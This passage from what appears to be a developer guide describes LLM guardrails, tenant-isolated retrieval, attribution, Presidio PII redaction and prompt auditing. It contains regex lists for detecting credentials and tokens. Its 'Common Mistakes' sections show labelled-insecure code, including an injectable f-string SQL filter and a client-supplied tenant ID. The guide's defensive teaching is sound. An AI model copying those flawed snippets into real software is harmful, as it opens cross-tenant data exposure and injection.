    if overlap < threshold:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason=f"Low grounding score: {overlap:.2%}",
            details={
                "overlap": overlap,
                "threshold": threshold,
                "ungrounded_terms": list(output_terms - context_terms)[:10],
            },
        )

    return ValidationResult(
        status=ValidationStatus.PASSED,
        details={"grounding_score": overlap},
    )

def extract_key_terms(text: str) -> list[str]:
    """Extract meaningful terms from text"""
    import re
    # Simple: words 4+ chars, lowercased
    words = re.findall(r'\b[a-zA-Z]{4,}\b', text.lower())
    # Filter common words
    stopwords = {'this', 'that', 'with', 'from', 'have', 'been', 'will', 'would'}
    return [w for w in words if w not in stopwords]

5. Content Safety

async def validate_content_safety(
    output: str,
) -> ValidationResult:
    """
    Check for toxic/harmful content.
    Uses simple pattern matching + optional LLM check.
    """
    # Quick pattern check
    toxic_patterns = [
        r'\b(hate|violence|harm|kill)\b',
        r'\b(password|secret|api.?key)\b',
    ]

    for pattern in toxic_patterns:
        if re.search(pattern, output, re.IGNORECASE):
            return ValidationResult(
                status=ValidationStatus.FAILED,
                reason=f"Potentially unsafe content detected",
            )

    # PII detection
    pii_patterns = {
        "email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
        "phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
        "ssn": r'\b\d{3}-\d{2}-\d{4}\b',
    }

    detected_pii = []
    for pii_type, pattern in pii_patterns.items():
        if re.search(pattern, output):
            detected_pii.append(pii_type)

    if detected_pii:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason=f"Potential PII detected: {detected_pii}",
            details={"pii_types": detected_pii},
        )

    return ValidationResult(status=ValidationStatus.PASSED)

6. Size Limits

def validate_size(
    output: str,
    max_chars: int = 50000,
    max_tokens: int = 10000,
) -> ValidationResult:
    """
    Ensure output is within size limits.
    """
    if len(output) > max_chars:
        return ValidationResult(
            status=ValidationStatus.FAILED,
            reason=f"Output exceeds {max_chars} chars: {len(output)}",
        )

    # Rough token estimate
    estimated_tokens = len(output) // 4
    if estimated_tokens > max_tokens:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason=f"Output may exceed token limit: ~{estimated_tokens}",
        )

    return ValidationResult(status=ValidationStatus.PASSED)

7. Combined Validator

from dataclasses import dataclass

@dataclass
class GuardrailsConfig:
    validate_schema: bool = True
    validate_no_ids: bool = True
    validate_grounding: bool = True
    validate_safety: bool = True
    validate_size: bool = True
    grounding_threshold: float = 0.3
    max_output_chars: int = 50000

async def run_guardrails(
    llm_output: dict,
    context_texts: list[str],
    schema: type[BaseModel],
    config: GuardrailsConfig = GuardrailsConfig(),
) -> tuple[BaseModel | None, list[ValidationResult]]:
    """
    Run all guardrails on LLM output.
    Returns parsed output and all validation results.
    """
    results = []
    parsed = None

    # 1. Schema validation
    if config.validate_schema:
        parsed, result = validate_schema(llm_output, schema)
        results.append(result)
        if not result.is_valid:
            return None, results  # Stop early

    output_str = str(llm_output)

    # 2. No hallucinated IDs
    if config.validate_no_ids:
        result = validate_no_ids(output_str)
        results.append(result)

    # 3. Grounding check
    if config.validate_grounding:
        result = validate_grounding(
            output_str,
            context_texts,
            config.grounding_threshold,
        )
        results.append(result)

    # 4. Content safety
    if config.validate_safety:
        result = await validate_content_safety(output_str)
        results.append(result)

    # 5. Size limits
    if config.validate_size:
        result = validate_size(output_str, config.max_output_chars)
        results.append(result)

    # Check for failures
    failures = [r for r in results if r.status == ValidationStatus.FAILED]
    if failures:
        return None, results

    return parsed, results
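
The FAIL branch in the diagram above usually maps to a bounded retry rather than a hard error. A sketch, assuming the llm client and GuardrailError from the surrounding examples:

async def generate_with_guardrails(
    prompt: str,
    context_texts: list[str],
    schema: type[BaseModel],
    max_attempts: int = 3,
) -> BaseModel:
    """Retry generation until guardrails pass or attempts run out."""
    for attempt in range(max_attempts):
        llm_output = await llm.generate(prompt)
        parsed, results = await run_guardrails(llm_output, context_texts, schema)
        if parsed is not None:
            return parsed

        # Feed failure reasons back so the model can self-correct
        reasons = [r.reason for r in results if not r.is_valid]
        prompt = f"{prompt}\n\nPrevious attempt failed validation: {reasons}"

    raise GuardrailError(f"Output failed validation after {max_attempts} attempts")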

OrchestKit Integration

# backend/app/workflows/agents/content_analyzer.py

async def analyze_with_guardrails(state: AnalysisState) -> AnalysisState:
    """Run LLM with output guardrails"""

    # Call LLM
    llm_response = await llm.generate(state.prompt)

    # Run guardrails
    parsed, validations = await run_guardrails(
        llm_output=llm_response,
        context_texts=state.context_texts,
        schema=AnalysisOutput,
    )

    # Log validations
    for v in validations:
        if v.status != ValidationStatus.PASSED:
            logger.warning(
                "guardrail_issue",
                status=v.status.value,
                reason=v.reason,
                trace_id=state.request_context.trace_id,
            )

    if parsed is None:
        raise GuardrailError(
            "LLM output failed validation",
            validations=[v for v in validations if not v.is_valid],
        )

    return state.with_output(parsed)

Common Mistakes

# ❌ BAD: No validation
artifact.content = llm_response["content"]  # Could be anything!

# ❌ BAD: Only schema validation
parsed = AnalysisOutput.model_validate(response)  # Ignores content issues

# ❌ BAD: Trusting LLM completely
if llm_response.get("is_safe", True):  # LLM said it's safe!
    use_response(llm_response)

# ✅ GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
    llm_output=response,
    context_texts=context,
    schema=AnalysisOutput,
)

Testing Guardrails

class TestGuardrails:

    def test_detects_hallucinated_uuid(self):
        output = "Analysis for doc 123e4567-e89b-12d3-a456-426614174000"
        result = validate_no_ids(output)
        assert result.status == ValidationStatus.FAILED

    def test_detects_low_grounding(self):
        output = "This is about quantum physics and black holes"
        context = ["Python programming tutorial"]
        result = validate_grounding(output, context)
        assert result.status == ValidationStatus.WARNING

    async def test_detects_pii(self):
        output = "Contact john@example.com for details"
        result = await validate_content_safety(output)
        assert result.status == ValidationStatus.WARNING
        assert "email" in result.details["pii_types"]

    async def test_full_pipeline_passes(self):
        valid_output = {
            "summary": "Introduction to machine learning",
            "key_concepts": ["ML", "training", "models"],
            "difficulty": "intermediate",
        }
        context = ["Machine learning is a subset of AI..."]

        parsed, results = await run_guardrails(
            llm_output=valid_output,
            context_texts=context,
            schema=AnalysisOutput,
        )

        assert parsed is not None
        assert all(r.is_valid for r in results)

Post-LLM Attribution

The Principle

Attribution is DETERMINISTIC, not LLM-generated.

The LLM produces content. We attach context from our records.

┌────────────────────────────────────────────────────────────┐
│                   POST-LLM PHASE                           │
├────────────────────────────────────────────────────────────┤
│                                                            │
│                ┌─────────────────────┐                     │
│                │       LLM           │                     │
│                │                     │                     │
│                │  Output: content    │                     │
│                │  (text, analysis)   │                     │
│                └──────────┬──────────┘                     │
│                           │                                │
│                           ▼                                │
│              ┌────────────────────────┐                    │
│              │   ATTRIBUTION LAYER    │                    │
│              │                        │                    │
│  From Pre-LLM:                        From Context:        │
│  ├─ source_refs ─────────────────────► source_ids         │
│  └─ chunk_ids                          │                   │
│                                        │                   │
│  From RequestContext:                  │                   │
│  ├─ user_id ─────────────────────────► user_id            │
│  ├─ tenant_id ───────────────────────► tenant_id          │
│  ├─ trace_id ────────────────────────► trace_id           │
│  └─ analysis_id ─────────────────────► analysis_id        │
│                                        │                   │
│  Generated:                            │                   │
│  ├─ new UUID ────────────────────────► artifact_id        │
│  └─ timestamp ───────────────────────► created_at         │
│              │                        │                    │
│              └────────────┬───────────┘                    │
│                           │                                │
│                           ▼                                │
│              ┌────────────────────────┐                    │
│              │    COMPLETE RESULT     │                    │
│              │                        │                    │
│              │  content + attribution │                    │
│              │  (ready for storage)   │                    │
│              └────────────────────────┘                    │
│                                                            │
└────────────────────────────────────────────────────────────┘

Implementation

1. Attribution Data Structure

from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID, uuid4

@dataclass
class AttributedResult:
    """LLM output with deterministic attribution"""

    # Generated identifier
    id: UUID

    # From RequestContext (system-provided)
    user_id: UUID
    tenant_id: UUID
    analysis_id: UUID
    trace_id: str

    # From Pre-LLM refs (deterministic)
    source_document_ids: list[UUID]
    source_chunk_ids: list[UUID]

    # From LLM (content only)
    content: str
    key_concepts: list[str]
    difficulty_level: str
    summary: str

    # Metadata
    created_at: datetime
    model_used: str
    processing_time_ms: float

2. Attribution Function

async def attribute_llm_output(
    llm_output: dict,
    ctx: RequestContext,
    source_refs: SourceReference,
    model_name: str,
    processing_time_ms: float,
) -> AttributedResult:
    """
    Attach context to LLM output.
    All attribution comes from our records, not the LLM.
    """

    # Validate LLM output has no IDs
    if contains_identifiers(llm_output):
        raise SecurityError("LLM output contains identifiers")

    return AttributedResult(
        # New ID for this artifact
        id=uuid4(),

        # From RequestContext (verified from JWT)
        user_id=ctx.user_id,
        tenant_id=ctx.tenant_id,
        analysis_id=ctx.resource_id,
        trace_id=ctx.trace_id,

        # From Pre-LLM capture (deterministic)
        source_document_ids=source_refs.document_ids,
        source_chunk_ids=source_refs.chunk_ids,

        # From LLM (content only)
        content=llm_output["analysis"],
        key_concepts=llm_output.get("key_concepts", []),
        difficulty_level=llm_output.get("difficulty", "intermediate"),
        summary=llm_output.get("summary", ""),

        # Metadata
        created_at=datetime.now(timezone.utc),
        model_used=model_name,
        processing_time_ms=processing_time_ms,
    )

def contains_identifiers(output: dict) -> bool:
    """Check if LLM output contains any identifiers"""
    import re

    output_str = str(output)

    # Check for UUIDs
    if re.search(UUID_PATTERN, output_str):
        return True

    # Check for ID field names in content
    for field in ["user_id", "tenant_id", "document_id"]:
        if field in output_str.lower():
            return True

    return False

3. Storage with Attribution

async def save_attributed_result(
    result: AttributedResult,
    db: AsyncSession,
) -> None:
    """
    Save result with all attribution intact.
    Attribution comes from our context, not LLM.
    """

    # Create artifact record
    artifact = Artifact(
        id=result.id,
        user_id=result.user_id,
        tenant_id=result.tenant_id,
        analysis_id=result.analysis_id,
        content=result.content,
        key_concepts=result.key_concepts,
        difficulty_level=result.difficulty_level,
        summary=result.summary,
        created_at=result.created_at,
        model_used=result.model_used,
    )
    db.add(artifact)

    # Create source links
    for doc_id in result.source_document_ids:
        link = ArtifactSourceLink(
            artifact_id=result.id,
            document_id=doc_id,
            tenant_id=result.tenant_id,  # Denormalized for RLS
        )
        db.add(link)

    await db.commit()

    # Audit log
    logger.audit(
        "artifact.created",
        artifact_id=result.id,
        user_id=result.user_id,
        tenant_id=result.tenant_id,
        source_count=len(result.source_document_ids),
    )

OrchestKit Integration

Content Analysis Workflow

# backend/app/workflows/agents/content_analyzer.py

async def create_analysis_artifact(state: AnalysisState) -> AnalysisState:
    """Create artifact with proper attribution"""

    # LLM output (content only)
    llm_output = state.llm_response

    # Attribute using our context
    attributed = await attribute_llm_output(
        llm_output=llm_output,
        ctx=state.request_context,          # From JWT
        source_refs=state.source_refs,       # From pre-LLM
        model_name=state.model_used,
        processing_time_ms=state.llm_time_ms,
    )

    # Save with attribution
    await save_attributed_result(attributed, state.db)

    return state.with_artifact(attributed)

Artifact Retrieval

# backend/app/api/artifacts.py

@router.get("/{artifact_id}")
async def get_artifact(
    artifact_id: UUID,
    ctx: RequestContext = Depends(get_request_context),
    db: AsyncSession = Depends(get_db),
):
    """Get artifact with source attribution"""

    # Query with tenant filter
    artifact = await db.execute(
        """
        SELECT a.*, array_agg(asl.document_id) as sources
        FROM artifacts a
        LEFT JOIN artifact_source_links asl ON a.id = asl.artifact_id
        WHERE a.id = :id
          AND a.tenant_id = :tenant_id  -- ALWAYS filter
        GROUP BY a.id
        """,
        {
            "id": artifact_id,
            "tenant_id": ctx.tenant_id,
        }
    )

    if not artifact:
        raise HTTPException(404)

    return ArtifactResponse(
        id=artifact.id,
        content=artifact.content,
        sources=artifact.sources,  # Deterministic from our records
        created_at=artifact.created_at,
    )

Common Mistakes

# ❌ BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
response = llm.generate(prompt)
doc_id = response["source_document"]  # HALLUCINATED!

# ❌ BAD: Trusting LLM-provided IDs
llm_output = {"analysis": "...", "user_id": "abc123"}
artifact.user_id = llm_output["user_id"]  # WRONG!

# ❌ BAD: Generating IDs in prompt
prompt = f"Generate a unique ID for this analysis: {analysis_id}"

# ✅ GOOD: Attribution from our records
artifact.user_id = ctx.user_id  # From JWT
artifact.sources = source_refs.document_ids  # From pre-LLM

# ✅ GOOD: Generate IDs ourselves
artifact.id = uuid4()  # We generate

# ✅ GOOD: LLM provides content only
artifact.content = llm_output["analysis"]  # Just the text

Testing Attribution

class TestAttribution:

    async def test_attribution_from_context_not_llm(self, ctx):
        """Attribution must come from our context"""

        # LLM returns content only
        llm_output = {
            "analysis": "This is the analysis",
            "key_concepts": ["ML", "AI"],
        }

        source_refs = SourceReference(
            document_ids=[uuid4(), uuid4()],
            chunk_ids=[uuid4()],
        )

        result = await attribute_llm_output(
            llm_output=llm_output,
            ctx=ctx,
            source_refs=source_refs,
            model_name="test-model",
            processing_time_ms=1.0,
        )

        # Attribution from context, not LLM
        assert result.user_id == ctx.user_id
        assert result.tenant_id == ctx.tenant_id
        assert result.source_document_ids == source_refs.document_ids

    async def test_rejects_llm_with_ids(self, ctx):
        """Reject LLM output that contains IDs"""

        bad_output = {
            "analysis": "Result for user 123e4567-e89b-12d3-a456-426614174000",
        }

        with pytest.raises(SecurityError):
            await attribute_llm_output(
                llm_output=bad_output,
                ctx=ctx,
                source_refs=source_refs,  # fixture-provided
                model_name="test-model",
                processing_time_ms=1.0,
            )

    async def test_source_links_created(self, ctx, db):
        """Source links are created with artifact"""

        result = await attribute_llm_output(...)
        await save_attributed_result(result, db)

        links = await db.execute(
            "SELECT * FROM artifact_source_links WHERE artifact_id = :id",
            {"id": result.id}
        )

        assert len(links) == len(result.source_document_ids)

Pre-LLM Filtering

Purpose

Before ANY data reaches the LLM, it must be:

  1. Scoped to the current tenant/user
  2. Filtered for relevance
  3. Stripped of identifiers
  4. Captured for later attribution
┌────────────────────────────────────────────────────────────┐
│                    PRE-LLM PHASE                           │
├────────────────────────────────────────────────────────────┤
│                                                            │
│  User Query ──► Tenant Filter ──► Content Extract ──► LLM  │
│       │              │                   │                 │
│       │              │                   │                 │
│       ▼              ▼                   ▼                 │
│  ┌─────────┐   ┌───────────┐     ┌─────────────┐          │
│  │ Query   │   │ Documents │     │ Text Only   │          │
│  │ Text    │   │ for THIS  │     │ (no IDs)    │          │
│  │         │   │ tenant    │     │             │          │
│  └─────────┘   └───────────┘     └─────────────┘          │
│                      │                                     │
│                      ▼                                     │
│              ┌─────────────┐                              │
│              │ Save Refs   │                              │
│              │ for Later   │  ◄── For post-LLM attribution│
│              │ Attribution │                              │
│              └─────────────┘                              │
│                                                            │
└────────────────────────────────────────────────────────────┘

Implementation

1. Tenant-Scoped Retrieval

from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID

@dataclass
class SourceReference:
    """Tracks what was retrieved for attribution"""
    document_ids: list[UUID]
    chunk_ids: list[UUID]
    similarity_scores: list[float]
    retrieval_timestamp: datetime

async def retrieve_with_isolation(
    query: str,
    ctx: RequestContext,
    limit: int = 10,
) -> tuple[list[str], SourceReference]:
    """
    Retrieve documents scoped to tenant/user.
    Returns: (content_texts, source_references)
    """
    # Embed query
    query_embedding = await embed(query)

    # Search with MANDATORY tenant filter
    results = await db.execute(
        """
        SELECT id, chunk_id, content,
               1 - (embedding <=> :query) as similarity  -- cosine distance -> similarity
        FROM document_chunks
        WHERE tenant_id = :tenant_id    -- REQUIRED
          AND user_id = :user_id        -- REQUIRED
          AND embedding <=> :query < 0.5
        ORDER BY embedding <=> :query
        LIMIT :limit
        """,
        {
            "tenant_id": ctx.tenant_id,  # From JWT
            "user_id": ctx.user_id,       # From JWT
            "query": query_embedding,
            "limit": limit,
        }
    )

    # Separate content from references
    content_texts = [r.content for r in results]
    source_refs = SourceReference(
        document_ids=[r.id for r in results],
        chunk_ids=[r.chunk_id for r in results],
        similarity_scores=[r.similarity for r in results],
        retrieval_timestamp=datetime.now(timezone.utc),
    )

    return content_texts, source_refs

2. Content Extraction (Strip IDs)

def extract_content_only(documents: list[Document]) -> list[str]:
    """
    Extract text content, stripping any embedded IDs.
    """
    contents = []
    for doc in documents:
        # Get content
        text = doc.content

        # Remove any embedded IDs (defensive)
        text = strip_identifiers(text)

        contents.append(text)

    return contents

def strip_identifiers(text: str) -> str:
    """Remove any identifiers that might have leaked into content"""
    import re

    # Remove UUIDs
    text = re.sub(
        r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
        '[REDACTED]',
        text,
        flags=re.IGNORECASE
    )

    # Remove common ID patterns
    patterns = [
        r'user_id:\s*\S+',
        r'tenant_id:\s*\S+',
        r'doc_id:\s*\S+',
    ]
    for pattern in patterns:
        text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)

    return text
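
A quick check of the stripper on a hypothetical input:

sample = "See doc_id: 42 and 123e4567-e89b-12d3-a456-426614174000"
print(strip_identifiers(sample))
# -> "See [REDACTED] and [REDACTED]"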

3. Full Pre-LLM Pipeline

@dataclass
class PreLLMResult:
    """Complete pre-LLM preparation result"""
    query: str
    context_texts: list[str]
    source_refs: SourceReference
    preparation_time_ms: float

async def prepare_for_llm(
    query: str,
    ctx: RequestContext,
) -> PreLLMResult:
    """
    Complete pre-LLM preparation:
    1. Retrieve with tenant isolation
    2. Extract content only
    3. Save references for attribution
    """
    start = time.monotonic()

    # Step 1: Tenant-scoped retrieval
    raw_results, source_refs = await retrieve_with_isolation(
        query=query,
        ctx=ctx,
    )

    # Step 2: Extract and clean content
    context_texts = [strip_identifiers(text) for text in raw_results]

    # Step 3: Audit for any remaining IDs
    for text in context_texts:
        violations = audit_prompt(text)
        if violations:
            logger.warning(
                "ID found in content, redacting",
                violations=violations,
            )

    elapsed = (time.monotonic() - start) * 1000

    return PreLLMResult(
        query=query,
        context_texts=context_texts,
        source_refs=source_refs,
        preparation_time_ms=elapsed,
    )

OrchestKit Integration

In Content Analysis Workflow

# backend/app/workflows/agents/retriever.py

async def retrieve_context(state: AnalysisState) -> AnalysisState:
    """RAG retrieval with tenant isolation"""

    ctx = state.request_context

    # Pre-LLM preparation
    pre_llm = await prepare_for_llm(
        query=state.analysis_request.query,
        ctx=ctx,
    )

    # Store for later phases
    return state.copy(
        context_texts=pre_llm.context_texts,
        source_refs=pre_llm.source_refs,
        # NO IDs in state that goes to LLM
    )
# backend/app/services/search.py

async def search_libraries(
    query: str,
    ctx: RequestContext,
) -> SearchResult:
    """Search golden dataset with isolation"""

    # Always filter by tenant
    results = await db.execute(
        """
        SELECT id, title, url, summary, content
        FROM golden_dataset
        WHERE tenant_id = :tenant_id
          AND search_vector @@ plainto_tsquery(:query)
        ORDER BY ts_rank(search_vector, plainto_tsquery(:query)) DESC
        LIMIT 20
        """,
        {
            "tenant_id": ctx.tenant_id,
            "query": query,
        }
    )

    # Return content and refs separately
    return SearchResult(
        items=[r.content for r in results],  # Content for LLM
        refs=[r.id for r in results],         # IDs for attribution
    )

Common Mistakes

# ❌ BAD: Query without tenant filter
results = await db.execute("SELECT * FROM documents")

# ❌ BAD: Tenant filter as optional
async def search(tenant_id: UUID | None = None):
    query = "SELECT * FROM documents"
    if tenant_id:  # Can be bypassed!
        query += f" WHERE tenant_id = '{tenant_id}'"

# ❌ BAD: Trusting client-provided tenant
async def search(request: Request):
    tenant_id = request.query_params["tenant_id"]  # Attacker controls!

# ❌ BAD: Including IDs in content
results = [{"id": doc.id, "content": doc.content} for doc in docs]

# ✅ GOOD: Mandatory tenant filter from context
results = await db.execute(
    "SELECT content FROM documents WHERE tenant_id = :tid",
    {"tid": ctx.tenant_id}  # From verified JWT
)

# ✅ GOOD: Content separate from refs
content = [doc.content for doc in docs]  # For LLM
refs = [doc.id for doc in docs]           # For attribution

Testing Pre-LLM Filtering

class TestPreLLMFiltering:

    async def test_retrieval_respects_tenant(
        self,
        tenant_a_ctx,
        tenant_b_ctx,
    ):
        # Create doc for tenant B
        await create_document(
            tenant_id=tenant_b_ctx.tenant_id,
            content="Secret data",
        )

        # Search as tenant A
        result = await prepare_for_llm(
            query="secret",
            ctx=tenant_a_ctx,
        )

        # Must not find tenant B's data
        assert len(result.context_texts) == 0

    async def test_content_has_no_uuids(self, ctx):
        result = await prepare_for_llm(
            query="test query",
            ctx=ctx,
        )

        for text in result.context_texts:
            assert not re.search(UUID_PATTERN, text)

    async def test_source_refs_captured(self, ctx):
        result = await prepare_for_llm(
            query="test query",
            ctx=ctx,
        )

        # Refs saved for attribution
        assert len(result.source_refs.document_ids) > 0
        assert result.source_refs.retrieval_timestamp is not None

Microsoft Presidio Integration

Enterprise-grade PII detection and anonymization with Microsoft Presidio.

Installation

pip install presidio-analyzer presidio-anonymizer
python -m spacy download en_core_web_lg

Basic Usage

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

# Initialize engines (singleton recommended)
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def detect_pii(text: str, language: str = "en") -> list:
    """Detect PII entities in text."""
    return analyzer.analyze(
        text=text,
        language=language,
        entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
    )

def anonymize_text(text: str, language: str = "en") -> str:
    """Detect and anonymize PII in text."""
    results = analyzer.analyze(text=text, language=language)
    return anonymizer.anonymize(text=text, analyzer_results=results).text
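
A quick smoke test (Presidio's default replace operator substitutes each entity with its type in angle brackets):

text = "My name is John Smith, reach me at john@example.com"
print(anonymize_text(text))
# Expected shape: "My name is <PERSON>, reach me at <EMAIL_ADDRESS>"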

Custom Operators

from presidio_anonymizer.entities import OperatorConfig

operators = {
    "PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
    "CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
    "EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
    "US_SSN": OperatorConfig("redact"),
}

anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)

Custom Recognizers

from presidio_analyzer import Pattern, PatternRecognizer

internal_id_recognizer = PatternRecognizer(
    supported_entity="INTERNAL_ID",
    patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)
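
Once registered, the custom entity participates in analysis like any built-in one:

results = analyzer.analyze(
    text="Ticket ID-AB-123456 was escalated",
    language="en",
    entities=["INTERNAL_ID"],
)
# One match with entity_type="INTERNAL_ID" and score 0.9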

Prompt Audit

Purpose

Before any prompt is sent to an LLM, audit it for forbidden content:

┌────────────────────────────────────────────────────────────┐
│                     PROMPT AUDIT                           │
├────────────────────────────────────────────────────────────┤
│                                                            │
│  Prompt Template + Variables ──► Audit ──► Send to LLM     │
│                                    │                       │
│                                    ▼                       │
│                          ┌──────────────┐                  │
│                          │  FORBIDDEN   │                  │
│                          │  PATTERNS    │                  │
│                          ├──────────────┤                  │
│                          │ • user_id    │                  │
│                          │ • tenant_id  │                  │
│                          │ • UUIDs      │                  │
│                          │ • API keys   │                  │
│                          │ • Tokens     │                  │
│                          │ • Secrets    │                  │
│                          └──────────────┘                  │
│                                    │                       │
│                    ┌───────────────┼───────────────┐       │
│                    ▼               ▼               ▼       │
│              ┌──────────┐   ┌──────────┐   ┌──────────┐   │
│              │  CLEAN   │   │ WARNING  │   │  BLOCK   │   │
│              │          │   │          │   │          │   │
│              │ Proceed  │   │ Log +    │   │ Reject   │   │
│              │          │   │ Proceed  │   │          │   │
│              └──────────┘   └──────────┘   └──────────┘   │
│                                                            │
└────────────────────────────────────────────────────────────┘

OrchestKit Forbidden Patterns

Critical (Block Immediately)

Pattern  | Regex                       | Why Block
UUID     | [0-9a-f]{8}-[0-9a-f]{4}-... | Hallucination, cross-tenant
API Key  | api[_-]?key                 | Secret exposure
Token    | token\s*[:=]                | Auth exposure
Password | password\s*[:=]             | Credential exposure
Secret   | secret\s*[:=]               | Generic secret

Warning (Log and Review)

Pattern     | Regex            | Why Warn
user_id     | user[_-]?id      | Likely context leak
tenant_id   | tenant[_-]?id    | Likely isolation leak
analysis_id | analysis[_-]?id  | Likely tracking leak
document_id | document[_-]?id  | Likely reference leak
session_id  | session[_-]?id   | Likely auth leak

Implementation

1. Pattern Definitions

import re
from enum import Enum
from dataclasses import dataclass

class AuditSeverity(Enum):
    CLEAN = "clean"
    WARNING = "warning"
    CRITICAL = "critical"

@dataclass
class AuditViolation:
    pattern: str
    severity: AuditSeverity
    match: str
    position: int

# OrchestKit-specific patterns
CRITICAL_PATTERNS = [
    # UUIDs
    (r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', "UUID"),
    # Secrets
    (r'api[_-]?key\s*[:=]\s*["\']?\S+', "API_KEY"),
    (r'password\s*[:=]\s*["\']?\S+', "PASSWORD"),
    (r'secret\s*[:=]\s*["\']?\S+', "SECRET"),
    (r'token\s*[:=]\s*["\']?\S+', "TOKEN"),
    (r'bearer\s+\S+', "BEARER_TOKEN"),
]

WARNING_PATTERNS = [
    # OrchestKit identifiers
    (r'\buser[_-]?id\b', "USER_ID_FIELD"),
    (r'\btenant[_-]?id\b', "TENANT_ID_FIELD"),
    (r'\banalysis[_-]?id\b', "ANALYSIS_ID_FIELD"),
    (r'\bdocument[_-]?id\b', "DOCUMENT_ID_FIELD"),
    (r'\bartifact[_-]?id\b', "ARTIFACT_ID_FIELD"),
    (r'\bchunk[_-]?id\b', "CHUNK_ID_FIELD"),
    (r'\bsession[_-]?id\b', "SESSION_ID_FIELD"),
    (r'\btrace[_-]?id\b', "TRACE_ID_FIELD"),
    (r'\bworkflow[_-]?run[_-]?id\b', "WORKFLOW_ID_FIELD"),
]

2. Audit Function

def audit_prompt(prompt: str) -> list[AuditViolation]:
    """
    Audit prompt for forbidden patterns.
    Returns list of violations.
    """
    violations = []

    # Check critical patterns
    for pattern, name in CRITICAL_PATTERNS:
        for match in re.finditer(pattern, prompt, re.IGNORECASE):
            violations.append(AuditViolation(
                pattern=name,
                severity=AuditSeverity.CRITICAL,
                match=match.group()[:50],  # Truncate for logging
                position=match.start(),
            ))

    # Check warning patterns
    for pattern, name in WARNING_PATTERNS:
        for match in re.finditer(pattern, prompt, re.IGNORECASE):
            violations.append(AuditViolation(
                pattern=name,
                severity=AuditSeverity.WARNING,
                match=match.group(),
                position=match.start(),
            ))

    return violations

def has_critical_violations(violations: list[AuditViolation]) -> bool:
    """Check if any violations are critical"""
    return any(v.severity == AuditSeverity.CRITICAL for v in violations)

3. Audit Decorator

from functools import wraps
import structlog

logger = structlog.get_logger()

def audit_before_llm(func):
    """
    Decorator that audits prompts before LLM call.
    Blocks on critical violations, logs warnings.
    """
    @wraps(func)
    async def wrapper(*args, **kwargs):
        # Extract prompt from args/kwargs
        prompt = kwargs.get("prompt") or args[0]

        # Audit
        violations = audit_prompt(prompt)

        # Log warnings
        for v in violations:
            if v.severity == AuditSeverity.WARNING:
                logger.warning(
                    "prompt_audit_warning",
                    pattern=v.pattern,
                    position=v.position,
                )

        # Block on critical
        if has_critical_violations(violations):
            critical = [v for v in violations
                       if v.severity == AuditSeverity.CRITICAL]
            raise PromptSecurityError(
                f"Prompt contains forbidden content: {[v.pattern for v in critical]}"
            )

        # Proceed
        return await func(*args, **kwargs)

    return wrapper

# Usage
@audit_before_llm
async def call_llm(prompt: str) -> str:
    return await llm.generate(prompt)

4. Safe Prompt Builder

from typing import Any

class SafePromptBuilder:
    """
    Builds prompts with built-in audit.
    Prevents accidental ID inclusion.
    """

    def __init__(self):
        self._parts: list[str] = []
        self._context_ids: dict[str, Any] = {}  # Stored but never in prompt

    def add_instruction(self, text: str) -> "SafePromptBuilder":
        """Add instruction text (audited)"""
        violations = audit_prompt(text)
        if has_critical_violations(violations):
            raise PromptSecurityError("Instruction contains forbidden content")
        self._parts.append(text)
        return self

    def add_content(self, content: str) -> "SafePromptBuilder":
        """Add user content (sanitized)"""
        # Strip any IDs from content
        clean_content = self._sanitize(content)
        self._parts.append(clean_content)
        return self

    def add_context_texts(self, texts: list[str]) -> "SafePromptBuilder":
        """Add context texts (sanitized)"""
        for text in texts:
            clean = self._sanitize(text)
            self._parts.append(f"- {clean}")
        return self

    def store_context_id(self, key: str, value: Any) -> "SafePromptBuilder":
        """Store ID for post-LLM attribution (never in prompt)"""
        self._context_ids[key] = value
        return self

    def _sanitize(self, text: str) -> str:
        """Remove any IDs from text"""
        # Remove UUIDs
        text = re.sub(
            r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
            '[ID]',
            text,
            flags=re.IGNORECASE
        )
        return text

    def build(self) -> tuple[str, dict]:
        """
        Build prompt and return with stored context.
        Returns: (prompt, context_ids)
        """
        prompt = "\n\n".join(self._parts)

        # Final audit
        violations = audit_prompt(prompt)
        if violations:
            logger.warning(
                "prompt_audit_final",
                violation_count=len(violations),
            )

        if has_critical_violations(violations):
            raise PromptSecurityError("Built prompt contains forbidden content")

        return prompt, self._context_ids

# Usage
builder = SafePromptBuilder()
prompt, context = (
    builder
    .add_instruction("Analyze the following content:")
    .add_content(user_query)
    .add_context_texts(retrieved_docs)
    .store_context_id("user_id", ctx.user_id)  # Stored, not in prompt
    .store_context_id("sources", source_refs)   # Stored, not in prompt
    .build()
)

OrchestKit Integration

Workflow Integration

# backend/app/workflows/agents/prompts/content_analysis.py

from llm_safety import SafePromptBuilder

def build_analysis_prompt(
    query: str,
    context_texts: list[str],
    ctx: RequestContext,
) -> tuple[str, dict]:
    """
    Build content analysis prompt safely.
    Context IDs stored separately for attribution.
    """
    return (
        SafePromptBuilder()
        .add_instruction("""
        You are an expert content analyzer. Analyze the following
        content and provide insights about:
